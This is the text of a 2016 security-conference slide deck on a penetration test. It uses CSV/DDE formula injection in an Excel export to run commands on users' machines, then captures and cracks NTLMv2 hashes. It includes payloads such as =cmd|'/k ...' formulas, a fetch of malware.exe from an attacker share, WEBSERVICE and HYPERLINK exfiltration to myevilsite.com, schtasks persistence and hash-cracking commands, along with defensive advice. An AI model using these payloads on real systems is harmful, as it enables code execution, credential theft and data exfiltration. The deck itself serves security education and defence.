Upload
jerome-smith
View
393
Download
1
Embed Size (px)
Citation preview
From CSV to CMD to qwertyA pentesting war story
Jerome Smith
BSides MCR August 2016
whoami
• In computer security for y years• Pentester for p years• At NCC Group for n years• Where y 2p and p 2n and 2n + 5 y
• CREST CCT (App)• Presented at first BSides MCR “SSL Checklist for Pentesters”
• exploresecurity.com | @exploresecurity
2
Based on a true story...
The story, characters, and incidents portrayed in this presentation are real.
Any similarity to actual events is completely intentional.
Some details have been changed for the sake of anonymity.
If you can identify any actual persons, places, buildings or products then I’m in trouble so keep it to yourself.
3
Plot
1. Web application with Excel export
2. Command execution on users’ machines (from CSV to
CMD…)
3. Grabbing hashes from low-level users
4. Cracking hashes (…to
qwerty)
5. Chase bugs
6. Can we improve the attack?• Why do we get these warnings?• Can we do anything to stop them?
4
5
Setting the scene
Background• Global business in finance sector• IIS 6.0• Classic ASP• What could possibly go wrong?
Excel export• Request data• Click export to Excel• Returned JavaScript to build a form• Form POSTed to another page to return the Excel file
6
Final POST
An extreme example of Excel export at work
But, more generally,
export of user-supplied input to Excel files is not uncommon
7
Export to Excel page
Reflection of user input• Request:
http://app/excel.asp?p=hello+world• Returned:
HTTP/1.1 200 OKContent-Type: text/htmlContent-Disposition: attachment; filename="ExcelOuput-46373.xls"Cache-control: public
hello world
Attack scenarios• Spoof data (deceive victim)• Exploit Excel vulnerabilities• OS command executionIn general, caching of file
downloads is often less secure
Exploit Excel vulnerabilities?
8
9
0x01 – 0xFF
10
OS command execution
Dynamic Data Exchange (DDE)
• Old Microsoft technology to facilitate data transfer between applications• A form of Inter-Process Communication (IPC)
• Security risks of Excel export first widely publicised by @albinowaxhttp://www.contextis.com/resources/blog/comma-separated-vulnerabilities/
• Consider:http://app/excel.asp?p=%3dcmd|'%2fk+ipconfig'!A0
• Returns the “XLS” file:=cmd|'/k ipconfig'!A0service | topic ! item
11
Warnings
Why wouldn’t it be secure?
The file came from our finance app and I requested it!
12
Command execution
cmd /k persists the window for a screenshotOtherwise it runs in a minimised window and exits
13
Domain credentials
• Now how about:• cmd /c \\<attacker_IP\evil$\malware.exe• cmd /c net use \\<attacker_IP>\c$• An ISP should block outbound SMB ports but we’re inside, remember
• Domain user account, no pentest laptop …• But another corporate workstation had Wireshark on it
Domain\username for free
14
Cracking NTLMv2 – John
http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats
username:$NETNTLMv2$domain$challenge$HMAC-MD5$blobsmithjer:$NETNTLMv2$domain$challenge$HMAC-MD5$blob
15
NTLM authentication
Challenge-response1. Client → Server (Type 1, negotiation) Features supported by the client and requested of the server2. Server → Client (Type 2, challenge) Features supported and agreed upon by the server + a challenge3. Client → Server (Type 3, authentication). More information about the client + response(s)
NTLM vs NTLMv2• All about the calculation of the response• NTLM: MD4 and DES (weak)• NTLMv2: HMAC-MD5 (input > password & challenge, hence “blob”)
16
Type 1 message
Type 1 (negotiation)
Client OS (Windows 7)N.B. little endian: dec7601 = 0x1DB1
Wireshark filter
“ntlmssp”
17
Type 2 message
Type 2 (challenge)
Challenge Indicates NTLMv2A block of name-value pairs
Info leakage (server)
18
Wireshark extract bytes
smithjer:$NETNTLMv2$domain$36edff8376e59e18$HMAC-MD5$blob
19
Type 3 message
Domain and username
Looks like NTLMv2No LM
Type 3 (authentication)
20
Type 3 message – drill-down
HMAC-MD5
The “blob” is everything after the HMAC in the “NTLM Response tree”• Includes client nonce, timestamp, server’s Target Info block… • Copy NTLM Response bytes, remove first 16 bytes (HMAC) • Likely to start 0x01010000
See, I told you it was v2 ;-)
blob
21
Let’s get cracking
smithjer:$NETNTLMv2$domain$36edff8376e59e18$4f68b56e9ce788d010f58b4f049b5c7f$0101000000000000295779de01bbd001b6f…
“An attacker with more time and resources…”
John
Hashcat
22
Wait a minute...
• Tried hashcat test case for NTLMv2… admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958... Recovered......: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts• Tried the same hashcat test case with John – didn’t work• Tried the smithjer hash on a GPU-based rig… Recovered......: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts• Tried the smithjer hash with John in hashcat format – it worked!• So I got my PoC in the report but why the mixed results?
23
It’s time to activate...
24
John (the Ripper, not Stuart Mill)
Hash cracked Hash didn’t crackusername::domain:challenge:HMAC-MD5:blob
username:$NETNTLMv2$domain$challenge$HMAC-MD5$blob
• Even though John was identifying the hash…Loaded 1 password hash (NTLMv2 C/R MD4 HMAC-MD5 [32/64])
…it wasn’t processing it correctly• John wanted the hashcat format
• To be fair to pentestmonkey, the cheatsheet was…“originally based on john-1.7.8-jumbo-5. Changes in supported hashes or hash formats since then may not be reflected on this page”
25
Hashcat
Hash Cracked Didn’t crack
admin (test) admin:...:blob[53 bytes]
smithjer:...:blob[360 bytes]
smithjer oclHashcat (Linux) hashcat (Windows)
catflap• Extracts NTLMv2 exchange from Wireshark capture file catflap <capture_file>• Recalculates NTLMv2 response with given password catflap <capture_file | hashcat_file> <password>
• Allows experiments with other inputs, i.e. the “blob”• A more faithful check than the standard admin test hash
26
Demo
Hashcat had a bug• Wasn’t handling “blobs” above a certain size• Didn’t affect oclHashcat• Didn’t affect hashcat on Linux (1)
Fixed in hashcat version 3
Can we improve the attack?- i.e cut out some of those warnings?
28
“Standard” warnings
(1)
(2a)
(3)
(2b)
Users and warnings – Piranha
44% clicked through warnings
70% clicked through warnings
75% clicked through warnings
30
Source of warnings
• Setting is a property of the file• Only effective if file has been trusted previously• Two stage attack (low and slow)?
• Benign payload =NotASheet!A1• Malicious payload
31
Trusted Documents
(1)
(2a)
Only the filename is storedDownloads with static filenames are of interest
Once “trusted” if the file’s start-up prompt is set to auto-update, only the third warning (CMD.EXE) is displayed
32
Excel file format
XLSX vs XLS vs CSV• Not something you always have control over• CSV: no Protected View warning• CSV: can’t contain start-up prompt auto-update setting
CSV format in XLS file• Format warning instead of Protected View warning• Formal security warnings (1) and (2a) not shown
• Therefore file cannot be not “trusted” in the registry• Curiously CSV format not supported: tab or CRLF cell delimiter
33
That CMD.EXE warning
Built-in Excel functions• Steal data =HYPERLINK("http://myevilsite.com/?d="&A1,"Click here")
• Limited info about the system e.g. current directory =INFO("DIRECTORY"), Excel version =INFO("RELEASE")
• =WEBSERVICE(URL)• Sadly doesn’t support authentication (i.e. force NTLM authentication)• Or file paths (local or UNC) or file://• But it will steal data without user interaction (unlike HYPERLINK) =WEBSERVICE("http://myevilsite.com/?data="&A1)
• =FILTERXML(XML, XPATH)• Any XXE or parsing bugs?
34
Alternatives to cmd.exe
• =powershell|'Test-Connection 127.0.0.1'!A0
Using 8.3 names doesn’t work as Excel doesn’t like ~ in the formula =cmd|'/k powershell Test-Connection 127.0.0.1'!A0
PATHEXT environment variable ignored – .exe only• .exe files in PATH where filename <= 12 characters =explorer|'https://nccgroup.trust'!A0 =schtasks|'/create /sc DAILY /tn WindowsUpdate /tr calc.exe'!A0 =javaws|'http://myevilsite.com/malware.jnlp'!A0 =rundll32|'shell32.dll,ShellExec_RunDLL calc.exe'!A0• N.B. if Excel is 32-bit, then the program will be run as such, etc.
But we’re still getting warnings about running exe files because the DDE call is failing
35
Native DDE services – 1/2
Tcl (Tool Command Language)• dde services "" ""{Excel {[Book1]Sheet1}} {Excel {[Book1]Sheet2}} {Excel {[Book1]Sheet3}} {Excel System} {PROGMAN PROGMAN} {Shell AppProperties} {Folders AppProperties} {PROGMAN PROGMAN}
Excel• dde request excel Sheet1 r1c1:r2c3
• dde execute excel Sheet1 {[formula("overwrite","r1c1")]}• dde execute excel Sheet1 {[alert("hello")][alert("world")]}• dde execute excel Sheet1 {[file.delete("e:\test")]}• dde execute excel Sheet1 {[exec("c:\windows\system32\calc.exe")]}
36
Native DDE services – 2/2
Progman• dde execute progman progman {[AddItem(calc.exe,Microsoft Word)]}
Folders / Shell• dde execute Folders AppProperties {[ViewFolder("","\\attacker_IP\c$",2)]}
What about in Excel?• This could save you hours: when testing, if Excel hangs, try closing Tcl• =Folders|AppProperties!'{[ViewFolder("","c:\windows\",1)]}' • That Tcl Service-Topic list wasn’t complete…
37
DDESpy
• Part of Visual Studio 6 (!)• Must be running when application launches
38
iexplore DDE
• =iexplore|WWW_OpenURL!nccgroup.com• No “remote data not accessible” warning • Slice of BeEF anyone?
• =iexplore|WWW_OpenURL!'\\<attacker_IP>\c$' (force network authentication)
• =iexplore|WWW_OpenURL!'c:\windows\system32\cmd.exe'
• No better than where we were really!• No obvious way to include switches anyway – a limitation of file://
39
firefox DDE
• =firefox|WWW_OpenURL!'http://exploresecurity.com/'• =firefox|WWW_GetWindowInfo!foo
40
Demo
(1) No Protective View warning as CSV(2) Just “Enable Content” warning as DDE call succeeded• Background navigation to phishing site could be very effective(3) No warnings – exactly which stars were aligned there?!• A file with same name previously downloaded
• Had content to elicit warnings, which were accepted• So it’s now “trusted”• Previous file need not have been malicious – remember =NotASheet!A1
• Malicious file’s start-up prompt set to auto-update links
41
Lessons
From CSV to CMD• Check out any Excel export that returns user-supplied data• CSV is not a benign format• DDE ≠ macro• In some cases it may be possible to cut down the Excel warnings
• Excel may have more to give in this area• Progman|Shell|Folders attractive DDE targets as always running• Very much work in progress – please explore!
• All this stuff applies to red-teaming tooFrom CMD to qwerty• Use or develop test cases i.e. something you know should work• Read the errors!• “Authoritative” references can go stale
42
Defence
Original article• Prefix = with '• This will “cast” the cell as text in XLS[X] and stop execution in CSV
+cmd|'/k ipconfig'!A0-cmd|'/k ipconfig'!A0
=cmd|'/k ipconfig'!A0
@SUM(cmd|'/k ipconfig'!A0)
"=cmd|'/k ipconfig'!A0" ""=cmd|'/k ipconfig'!A0
=(cmd|'/k ipconfig'!A0)
=0-cmd|'/k ipconfig'!A0This is beginning to feel like XSS blacklisting
• Validation against a strict whitelist of “known good” (length, characters, format) should always be the go-to defensive strategy
• Otherwise e.g. for XLS[X] consider always prefixing cell with apostrophe
43
References
DDE• https://www.tcl.tk/man/tcl8.6/TclCmd/dde.htm (Tcl)• http://rpackages.ianhowson.com/rforge/tcltk2/man/windows/tk2dde.html (examples)• https://support.microsoft.com/en-us/kb/128185 (Excel XLM reference)
Hashcat test cases• http://hashcat.net/wiki/doku.php?id=example_hashes
Catflap• https://github.com/nccgroup/ (or https://github.com/exploresecurity/catflap)
NTLM deep-dive• http://davenport.sourceforge.net/ntlm.html• http://ubiqx.org/cifs/SMB.html#SMB.8• http://www.innovation.ch/personal/ronald/ntlm.html• http://hashcat.net/forum/archive/index.php?thread-2011.html• https://msdn.microsoft.com/en-us/library/cc207842.aspx
44
Appendix 1: NetNTLMv2 from PCAP
Challengetshark -Y "ntlmssp.messagetype == 0x00000002" -T fields -e ntlmssp.ntlmserverchallenge
Domaintshark -Y "ntlmssp.messagetype == 0x00000003" -T fields -e ntlmssp.auth.domain
Usernametshark -Y "ntlmssp.messagetype == 0x00000003" -T fields -e ntlmssp.auth.username
HMAC-MD5tshark -Y "ntlmssp.messagetype == 0x00000003" -T fields -e ntlmssp.ntlmv2_response | sed 's/://g' | cut -c 1-32
Blobtshark -Y "ntlmssp.messagetype == 0x00000003" -T fields -e ntlmssp.ntlmv2_response | sed 's/://g' | cut -c 33-
45
Appendix 2: NetNTLMv2 calculations
1. NTHASH = MD4(Unicode password)echo -n $2 | iconv -f ascii -t utf16 | tail -c +3 | openssl dgst -md4 –binary | xxd –p
2. INTHASH = HMAC-MD5(Unicode uppercase username | Unicode domain, NTHASH)echo -n ${USERNAME^^}$DOMAIN | iconv -f ascii -t utf16 | tail -c +3 | openssl dgst -md5 -mac HMAC -macopt hexkey:$NTHASH –binary | xxd –p
3. HMAC = HMAC-MD5(Challenge | blob, INTHASH)echo -n $CHALLENGE$BLOB | xxd -r –p | openssl dgst -md5 -mac HMAC -macopt hexkey:$INTHASH –binary | xxd -p
46
fin
You have been watching…
Jerome @exploresecurity
Script passableHairneeds cuttingMake-up requiredCostume is about the right word
Tip of the hat to James @albinowax
Cara @bones_codes
Michael Roberts
Andy @ZephrFish
Raquel Alvarez